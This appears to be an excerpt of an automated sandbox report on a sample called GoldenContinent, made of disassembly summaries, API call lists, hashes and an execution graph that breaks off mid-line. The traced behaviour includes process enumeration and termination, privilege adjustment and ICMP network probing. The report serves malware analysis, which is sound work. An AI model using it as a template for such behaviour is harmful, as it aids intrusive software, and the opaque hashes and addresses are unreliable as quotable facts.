                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:51
                                                                                                                                                                                                                                                                            execution_graph 102091 c28782 102096 c2853e 102091->102096 102094 c287aa 102101 c2856f try_get_first_available_module 102096->102101 102098 c2876e 102115 c22b5c 26 API calls __cftof 102098->102115 102100 c286c3 102100->102094 102108 c30d04 102100->102108 102104 c286b8 102101->102104 102111 c1917b 40 API calls 2 library calls 102101->102111 102103 c2870c 102103->102104 102112 c1917b 40 API calls 2 library calls 102103->102112 102104->102100 102114 c1f649 20 API calls __dosmaperr 102104->102114 102106 c2872b 102106->102104 102113 c1917b 40 API calls 2 library calls 102106->102113 102116 c30401 102108->102116 102110 c30d1f 102110->102094 102111->102103 102112->102106 102113->102104 102114->102098 102115->102100 102119 c3040d CallCatchBlock 102116->102119 102117 c3041b 102174 c1f649 20 API calls __dosmaperr 102117->102174 102119->102117 102121 c30454 102119->102121 102120 c30420 102175 c22b5c 26 API calls __cftof 102120->102175 102127 c309db 102121->102127 102126 c3042a __wsopen_s 102126->102110 102177 c307af 102127->102177 102130 c30a26 102195 c25594 102130->102195 102131 c30a0d 102209 c1f636 20 API calls __dosmaperr 102131->102209 102134 c30a2b 102136 c30a34 102134->102136 102137 c30a4b 102134->102137 102135 c30a12 102210 c1f649 20 API calls __dosmaperr 102135->102210 102211 c1f636 20 API calls __dosmaperr 102136->102211 102208 c3071a CreateFileW 102137->102208 102141 c30478 102176 c304a1 LeaveCriticalSection __wsopen_s 102141->102176 102142 c30a39 102212 c1f649 20 API calls __dosmaperr 102142->102212 102144 c30b01 GetFileType 102145 c30b53 102144->102145 102146 c30b0c GetLastError 102144->102146 102217 c254dd 21 API calls 2 library calls 102145->102217 102215 c1f613 20 API calls __dosmaperr 102146->102215 102147 c30ad6 GetLastError 102214 c1f613 20 API calls __dosmaperr 102147->102214 102150 c30a84 102150->102144 102150->102147 102213 c3071a CreateFileW 102150->102213 102151 c30b1a CloseHandle 102151->102135 102155 c30b43 102151->102155 102154 c30ac9 102154->102144 102154->102147 102216 c1f649 20 API calls __dosmaperr 102155->102216 102156 c30b74 102158 c30bc0 102156->102158 102218 c3092b 72 API calls 3 library calls 102156->102218 102163 c30bed 102158->102163 102219 c304cd 72 API calls 4 library calls 102158->102219 102159 c30b48 102159->102135 102162 c30be6 102162->102163 102164 c30bfe 102162->102164 102220 c28a2e 102163->102220 102164->102141 102166 c30c7c CloseHandle 102164->102166 102235 c3071a CreateFileW 102166->102235 102168 c30ca7 102169 c30cdd 102168->102169 102170 c30cb1 GetLastError 102168->102170 102169->102141 102236 c1f613 20 API calls __dosmaperr 102170->102236 102172 c30cbd 102237 c256a6 21 API calls 2 library calls 102172->102237 102174->102120 102175->102126 102176->102126 102178 c307d0 102177->102178 102183 c307ea 102177->102183 102178->102183 102245 c1f649 20 API calls __dosmaperr 102178->102245 102181 c307df 102246 c22b5c 26 API calls __cftof 102181->102246 102238 c3073f 102183->102238 102184 c30851 102192 c308a4 102184->102192 102249 c1da7d 26 API calls 2 library calls 102184->102249 102185 c30822 102185->102184 102247 c1f649 20 API calls __dosmaperr 102185->102247 102188 c3089f 102190 c3091e 102188->102190 102188->102192 102189 c30846 102248 c22b5c 26 API calls __cftof 102189->102248 102250 c22b6c 11 API calls _abort 102190->102250 102192->102130 102192->102131 102194 c3092a 102196 c255a0 CallCatchBlock 102195->102196 102253 c232d1 EnterCriticalSection 102196->102253 102198 c255a7 102199 c255cc 102198->102199 102203 c2563a EnterCriticalSection 102198->102203 102206 c255ee 102198->102206 102257 c25373 102199->102257 102202 c25617 __wsopen_s 102202->102134 102205 c25647 LeaveCriticalSection 102203->102205 102203->102206 102205->102198 102254 c2569d 102206->102254 102208->102150 102209->102135 102210->102141 102211->102142 102212->102135 102213->102154 102214->102135 102215->102151 102216->102159 102217->102156 102218->102158 102219->102162 102283 c25737 102220->102283 102222 c28a44 102296 c256a6 21 API calls 2 library calls 102222->102296 102224 c28a3e 102224->102222 102225 c25737 __wsopen_s 26 API calls 102224->102225 102234 c28a76 102224->102234 102227 c28a6d 102225->102227 102226 c25737 __wsopen_s 26 API calls 102228 c28a82 CloseHandle 102226->102228 102231 c25737 __wsopen_s 26 API calls 102227->102231 102228->102222 102232 c28a8e GetLastError 102228->102232 102229 c28abe 102229->102141 102230 c28a9c 102230->102229 102297 c1f613 20 API calls __dosmaperr 102230->102297 102231->102234 102232->102222 102234->102222 102234->102226 102235->102168 102236->102172 102237->102169 102239 c30757 102238->102239 102240 c30772 102239->102240 102251 c1f649 20 API calls __dosmaperr 102239->102251 102240->102185 102242 c30796 102252 c22b5c 26 API calls __cftof 102242->102252 102244 c307a1 102244->102185 102245->102181 102246->102183 102247->102189 102248->102184 102249->102188 102250->102194 102251->102242 102252->102244 102253->102198 102265 c23319 LeaveCriticalSection 102254->102265 102256 c256a4 102256->102202 102266 c24ff0 102257->102266 102259 c25385 102263 c25392 102259->102263 102273 c23778 11 API calls 2 library calls 102259->102273 102262 c253e4 102262->102206 102264 c254ba EnterCriticalSection 102262->102264 102274 c22d38 102263->102274 102264->102206 102265->102256 102272 c24ffd __dosmaperr 102266->102272 102267 c2503d 102281 c1f649 20 API calls __dosmaperr 102267->102281 102268 c25028 RtlAllocateHeap 102269 c2503b 102268->102269 102268->102272 102269->102259 102272->102267 102272->102268 102280 c1521d 7 API calls 2 library calls 102272->102280 102273->102259 102275 c22d43 RtlFreeHeap 102274->102275 102279 c22d6c __dosmaperr 102274->102279 102276 c22d58 102275->102276 102275->102279 102282 c1f649 20 API calls __dosmaperr 102276->102282 102278 c22d5e GetLastError 102278->102279 102279->102262 102280->102272 102281->102269 102282->102278 102284 c25744 102283->102284 102286 c25759 102283->102286 102298 c1f636 20 API calls __dosmaperr 102284->102298 102291 c2577e 102286->102291 102300 c1f636 20 API calls __dosmaperr 102286->102300 102287 c25749 102299 c1f649 20 API calls __dosmaperr 102287->102299 102289 c25789 102301 c1f649 20 API calls __dosmaperr 102289->102301 102291->102224 102293 c25751 102293->102224 102294 c25791 102302 c22b5c 26 API calls __cftof 102294->102302 102296->102230 102297->102229 102298->102287 102299->102293 102300->102289 102301->102294 102302->102293 102303 c41ac5 102304 c41acd 102303->102304 102307 bfd535 102303->102307 102358 c57a87 8 API calls __fread_nolock 102304->102358 102306 c41adf 102359 c57a00 8 API calls __fread_nolock 102306->102359 102333 c1014b 102307->102333 102309 c41b09 102360 c00340 102309->102360 102312 bfd589 102342 bfc32d 102312->102342 102313 c41b30 102314 c41b44 102313->102314 102383 c761a2 53 API calls _wcslen 102313->102383 102318 c1014b 8 API calls 102321 bfd66e messages 102318->102321 102319 c41b61 102319->102307 102384 c57a87 8 API calls __fread_nolock 102319->102384 102325 c41f79 102321->102325 102327 c41f94 102321->102327 102328 bfbed9 8 API calls 102321->102328 102331 bfd911 messages 102321->102331 102349 bfc3ab 102321->102349 102385 bfb4c8 8 API calls 102321->102385 102322 bfc3ab 8 API calls 102330 bfd9ac messages 102322->102330 102386 c556ae 8 API calls messages 102325->102386 102328->102321 102332 bfd9c3 102330->102332 102357 c0e30a 8 API calls messages 102330->102357 102331->102322 102331->102330 102334 c10150 ___std_exception_copy 102333->102334 102335 c1016a 102334->102335 102337 c1016c 102334->102337 102387 c1521d 7 API calls 2 library calls 102334->102387 102335->102312 102338 c109dd 102337->102338 102388 c13614 RaiseException 102337->102388 102389 c13614 RaiseException 102338->102389 102341 c109fa 102341->102312 102345 bfc33d 102342->102345 102343 bfc345 102343->102318 102344 c1014b 8 API calls 102344->102345 102345->102343 102345->102344 102348 bfc32d 8 API calls 102345->102348 102390 bfbf73 102345->102390 102395 bfbed9 102345->102395 102348->102345 102350 bfc3b9 102349->102350 102356 bfc3e1 messages 102349->102356 102351 bfc3c7 102350->102351 102352 bfc3ab 8 API calls 102350->102352 102353 bfc3cd 102351->102353 102354 bfc3ab 8 API calls 102351->102354 102352->102351 102353->102356 102411 bfc7e0 8 API calls messages 102353->102411 102354->102353 102356->102321 102357->102330 102358->102306 102359->102309 102362 c00376 messages 102360->102362 102361 c105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102361->102362 102362->102361 102363 c4632b 102362->102363 102364 c0049d messages 102362->102364 102366 c01695 102362->102366 102367 c1014b 8 API calls 102362->102367 102369 c4625a 102362->102369 102370 bfbed9 8 API calls 102362->102370 102371 c45cdb 102362->102371 102377 bfbf73 8 API calls 102362->102377 102378 c10413 29 API calls pre_c_initialization 102362->102378 102379 c00aae messages 102362->102379 102380 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102362->102380 102381 c46115 102362->102381 102412 c01990 102362->102412 102474 c01e50 102362->102474 102487 c63fe1 81 API calls __wsopen_s 102363->102487 102364->102313 102366->102364 102374 bfbed9 8 API calls 102366->102374 102367->102362 102486 c63fe1 81 API calls __wsopen_s 102369->102486 102370->102362 102371->102364 102376 bfbed9 8 API calls 102371->102376 102374->102364 102376->102364 102377->102362 102378->102362 102485 c63fe1 81 API calls __wsopen_s 102379->102485 102380->102362 102484 c63fe1 81 API calls __wsopen_s 102381->102484 102383->102319 102384->102319 102385->102321 102386->102327 102387->102334 102388->102338 102389->102341 102399 c1017b 102390->102399 102392 bfbf88 102393 c1014b 8 API calls 102392->102393 102394 bfbf96 102393->102394 102394->102345 102396 bfbefc __fread_nolock 102395->102396 102397 bfbeed 102395->102397 102396->102345 102397->102396 102398 c1017b 8 API calls 102397->102398 102398->102396 102400 c1014b ___std_exception_copy 102399->102400 102401 c1016a 102400->102401 102403 c1016c 102400->102403 102408 c1521d 7 API calls 2 library calls 102400->102408 102401->102392 102404 c109dd 102403->102404 102409 c13614 RaiseException 102403->102409 102410 c13614 RaiseException 102404->102410 102407 c109fa 102407->102392 102408->102400 102409->102404 102410->102407 102411->102356 102413 c019b6 102412->102413 102414 c01a2e 102412->102414 102415 c019c3 102413->102415 102416 c46b60 102413->102416 102417 c46a4d 102414->102417 102432 c01a3d 102414->102432 102425 c46b84 102415->102425 102426 c019cd 102415->102426 102494 c785db 224 API calls 2 library calls 102416->102494 102419 c46b54 102417->102419 102420 c46a58 102417->102420 102493 c63fe1 81 API calls __wsopen_s 102419->102493 102492 c0b35c 224 API calls 102420->102492 102421 c00340 224 API calls 102421->102432 102424 c46bb5 102427 c46bc0 102424->102427 102428 c46be2 102424->102428 102425->102424 102431 c46b9c 102425->102431 102430 bfbed9 8 API calls 102426->102430 102473 c019e0 messages 102426->102473 102496 c785db 224 API calls 2 library calls 102427->102496 102497 c760e6 102428->102497 102429 c01bb5 102429->102362 102430->102473 102495 c63fe1 81 API calls __wsopen_s 102431->102495 102432->102421 102432->102429 102433 c46979 102432->102433 102436 c46908 102432->102436 102449 c01ba9 102432->102449 102457 c01af4 102432->102457 102432->102473 102491 c63fe1 81 API calls __wsopen_s 102433->102491 102490 c63fe1 81 API calls __wsopen_s 102436->102490 102439 c46dd9 102441 c46e0f 102439->102441 102597 c781ce 65 API calls 102439->102597 102599 bfb4c8 8 API calls 102441->102599 102443 c46c81 102570 c61ad8 8 API calls 102443->102570 102445 c46db7 102573 bf8ec0 102445->102573 102448 bfbed9 8 API calls 102448->102473 102449->102429 102489 c63fe1 81 API calls __wsopen_s 102449->102489 102451 c46ded 102454 bf8ec0 52 API calls 102451->102454 102453 c46c08 102504 c6148b 102453->102504 102468 c46df5 _wcslen 102454->102468 102456 c4691d messages 102456->102433 102469 c01b62 messages 102456->102469 102471 c01a23 messages 102456->102471 102457->102449 102488 c01ca0 8 API calls 102457->102488 102459 c46c93 102571 bfbd07 8 API calls 102459->102571 102461 c01b55 102461->102449 102461->102469 102463 c46dbf _wcslen 102463->102439 102596 bfb4c8 8 API calls 102463->102596 102465 c46c9c 102472 c6148b 8 API calls 102465->102472 102468->102441 102598 bfb4c8 8 API calls 102468->102598 102469->102448 102469->102471 102469->102473 102471->102362 102472->102473 102473->102439 102473->102471 102572 c7808f 53 API calls __wsopen_s 102473->102572 102477 c01e6d messages 102474->102477 102475 c02512 102482 c01ff7 messages 102475->102482 103311 c0be08 39 API calls 102475->103311 102477->102475 102479 c47837 102477->102479 102480 c4766b 102477->102480 102477->102482 103309 c0e322 8 API calls messages 102477->103309 102479->102482 103310 c1d2d5 39 API calls 102479->103310 103308 c1d2d5 39 API calls 102480->103308 102482->102362 102484->102379 102485->102364 102486->102364 102487->102364 102488->102461 102489->102471 102490->102456 102491->102473 102492->102469 102493->102416 102494->102473 102495->102471 102496->102473 102498 c46bed 102497->102498 102499 c76101 102497->102499 102498->102443 102498->102453 102500 c1017b 8 API calls 102499->102500 102502 c76123 102500->102502 102501 c1014b 8 API calls 102501->102502 102502->102498 102502->102501 102600 c61400 8 API calls 102502->102600 102505 c61499 102504->102505 102507 c46c32 102504->102507 102506 c1014b 8 API calls 102505->102506 102505->102507 102506->102507 102508 c02b20 102507->102508 102509 c02b61 102508->102509 102510 c02fc0 102509->102510 102511 c02b86 102509->102511 102770 c105b2 5 API calls __Init_thread_wait 102510->102770 102512 c02ba0 102511->102512 102513 c47bd8 102511->102513 102601 c03160 102512->102601 102733 c77af9 102513->102733 102517 c02fca 102520 c0300b 102517->102520 102771 bfb329 102517->102771 102519 c47be4 102519->102473 102524 c47bed 102520->102524 102526 c0303c 102520->102526 102521 c03160 9 API calls 102523 c02bc6 102521->102523 102523->102520 102525 c02bfc 102523->102525 102781 c63fe1 81 API calls __wsopen_s 102524->102781 102525->102524 102545 c02c18 __fread_nolock 102525->102545 102778 bfb4c8 8 API calls 102526->102778 102529 c03049 102779 c0e6e8 224 API calls 102529->102779 102530 c02fe4 102777 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102530->102777 102533 c47c15 102782 c63fe1 81 API calls __wsopen_s 102533->102782 102535 c47c78 102784 c761a2 53 API calls _wcslen 102535->102784 102536 c02d4c 102537 c03160 9 API calls 102536->102537 102539 c02d59 102537->102539 102546 c03160 9 API calls 102539->102546 102547 c02dd7 messages 102539->102547 102540 c1014b 8 API calls 102540->102545 102541 c03082 102780 c0fe39 8 API calls 102541->102780 102542 c1017b 8 API calls 102542->102545 102544 c02f2d 102544->102473 102545->102529 102545->102533 102545->102540 102545->102542 102545->102547 102550 c00340 224 API calls 102545->102550 102551 c02d3f 102545->102551 102552 c47c59 102545->102552 102548 c02d73 102546->102548 102547->102541 102553 c03160 9 API calls 102547->102553 102556 c02e8b messages 102547->102556 102611 c0f950 102547->102611 102618 c7ad47 102547->102618 102623 c7ab3f 102547->102623 102645 c79fe8 102547->102645 102648 c7a5b2 102547->102648 102654 c7a9ac 102547->102654 102662 c6664c 102547->102662 102669 c6f94a 102547->102669 102678 c79ffc 102547->102678 102681 c0ac3e 102547->102681 102700 c7a6aa 102547->102700 102708 c70fb8 102547->102708 102785 c63fe1 81 API calls __wsopen_s 102547->102785 102548->102547 102557 bfbed9 8 API calls 102548->102557 102550->102545 102551->102535 102551->102536 102783 c63fe1 81 API calls __wsopen_s 102552->102783 102553->102547 102556->102544 102769 c0e322 8 API calls messages 102556->102769 102557->102547 102570->102459 102571->102465 102572->102445 102574 bf8ed5 102573->102574 102575 bf8ed2 102573->102575 102576 bf8edd 102574->102576 102577 bf8f0b 102574->102577 102575->102463 103304 c15536 26 API calls 102576->103304 102579 c36b1f 102577->102579 102582 bf8f1d 102577->102582 102587 c36a38 102577->102587 103307 c154f3 26 API calls 102579->103307 102580 bf8eed 102586 c1014b 8 API calls 102580->102586 103305 c0fe6f 51 API calls 102582->103305 102583 c36b37 102583->102583 102588 bf8ef7 102586->102588 102590 c1017b 8 API calls 102587->102590 102591 c36ab1 102587->102591 102589 bfb329 8 API calls 102588->102589 102589->102575 102592 c36a81 102590->102592 103306 c0fe6f 51 API calls 102591->103306 102593 c1014b 8 API calls 102592->102593 102594 c36aa8 102593->102594 102595 bfb329 8 API calls 102594->102595 102595->102591 102596->102439 102597->102451 102598->102441 102599->102471 102600->102502 102602 c031a1 102601->102602 102603 c0317d 102601->102603 102786 c105b2 5 API calls __Init_thread_wait 102602->102786 102610 c02bb0 102603->102610 102788 c105b2 5 API calls __Init_thread_wait 102603->102788 102605 c031ab 102605->102603 102787 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102605->102787 102607 c09f47 102607->102610 102789 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102607->102789 102610->102521 102790 bfc98d 102611->102790 102613 c0f964 102614 c4fb20 Sleep 102613->102614 102615 c0f96c timeGetTime 102613->102615 102616 bfc98d 39 API calls 102615->102616 102617 c0f982 102616->102617 102617->102547 102619 bf8ec0 52 API calls 102618->102619 102620 c7ad63 102619->102620 102796 c5dd87 CreateToolhelp32Snapshot Process32FirstW 102620->102796 102622 c7ad72 102622->102547 102624 bf8ec0 52 API calls 102623->102624 102625 c7ab62 102624->102625 102626 c5dd87 46 API calls 102625->102626 102627 c7ab73 102626->102627 102628 c7abc3 OpenProcess 102627->102628 102635 c7ab78 102627->102635 102629 c7acc2 TerminateProcess 102628->102629 102630 c7abdd GetLastError 102628->102630 102631 c7ad20 CloseHandle 102629->102631 102632 c7accf GetLastError 102629->102632 102633 c7abec 102630->102633 102641 c7ac72 102630->102641 102631->102635 102638 c7ace3 102632->102638 102928 c5d715 12 API calls 102633->102928 102635->102547 102636 c7abfa 102929 c52010 11 API calls messages 102636->102929 102638->102631 102639 c7ac04 102640 c7ac08 OpenProcess 102639->102640 102644 c7ac1a 102639->102644 102640->102644 102641->102629 102641->102635 102643 c7ac70 102643->102641 102930 c51a0b AdjustTokenPrivileges CloseHandle messages 102644->102930 102931 c789b6 102645->102931 102647 c79ff8 102647->102547 102649 c7a5c5 102648->102649 102650 bf8ec0 52 API calls 102649->102650 102653 c7a5d4 102649->102653 102651 c7a632 102650->102651 103044 c618a9 102651->103044 102653->102547 102656 c7aa08 102654->102656 102661 c7a9c8 102654->102661 102655 c7aa26 102657 bfc98d 39 API calls 102655->102657 102659 c7aa8e 102655->102659 102655->102661 102656->102655 102658 bfc98d 39 API calls 102656->102658 102657->102659 102658->102655 103085 c60372 102659->103085 102661->102547 102663 bf8ec0 52 API calls 102662->102663 102664 c66662 102663->102664 103156 c5dc54 102664->103156 102666 c6666a 102667 c6666e GetLastError 102666->102667 102668 c66683 102666->102668 102667->102668 102668->102547 102670 c1017b 8 API calls 102669->102670 102671 c6f95b 102670->102671 103217 bf423c 102671->103217 102674 bf8ec0 52 API calls 102675 c6f97c GetEnvironmentVariableW 102674->102675 103220 c6160f 8 API calls 102675->103220 102677 c6f999 messages 102677->102547 102679 c789b6 119 API calls 102678->102679 102680 c7a00c 102679->102680 102680->102547 102682 bf8ec0 52 API calls 102681->102682 102683 c0ac68 102682->102683 103221 c0bc58 102683->103221 102685 c0ac7f 102686 bfc98d 39 API calls 102685->102686 102695 c0b09b _wcslen 102685->102695 102686->102695 102687 c0bbbe 43 API calls 102687->102695 102688 c14d98 _strftime 40 API calls 102688->102695 102692 bf6c03 8 API calls 102692->102695 102693 c0b1fb 102693->102547 102694 bfc98d 39 API calls 102694->102695 102695->102687 102695->102688 102695->102692 102695->102693 102695->102694 102696 bf8ec0 52 API calls 102695->102696 102697 bf8577 8 API calls 102695->102697 103226 bf396b 102695->103226 103236 bf3907 102695->103236 103240 bf7ad5 102695->103240 103245 bfad40 8 API calls __fread_nolock 102695->103245 103246 bf7b1a 8 API calls 102695->103246 102696->102695 102697->102695 102701 c7a705 102700->102701 102707 c7a6c5 102700->102707 102702 c7a723 102701->102702 102703 bfc98d 39 API calls 102701->102703 102704 bfc98d 39 API calls 102702->102704 102705 c7a780 102702->102705 102702->102707 102703->102702 102704->102705 102706 c60372 58 API calls 102705->102706 102706->102707 102707->102547 102709 c70fe1 102708->102709 102710 c7100f WSAStartup 102709->102710 102711 bfc98d 39 API calls 102709->102711 102712 c71054 102710->102712 102732 c71023 messages 102710->102732 102714 c70ffc 102711->102714 103284 c0c1f6 102712->103284 102714->102710 102717 bfc98d 39 API calls 102714->102717 102716 bf8ec0 52 API calls 102718 c71069 102716->102718 102719 c7100b 102717->102719 103289 c0f9d4 WideCharToMultiByte 102718->103289 102719->102710 102721 c71075 inet_addr gethostbyname 102722 c71093 IcmpCreateFile 102721->102722 102721->102732 102723 c710d3 102722->102723 102722->102732 102724 c1017b 8 API calls 102723->102724 102725 c710ec 102724->102725 102726 bf423c 8 API calls 102725->102726 102727 c710f7 102726->102727 102728 c71102 IcmpSendEcho 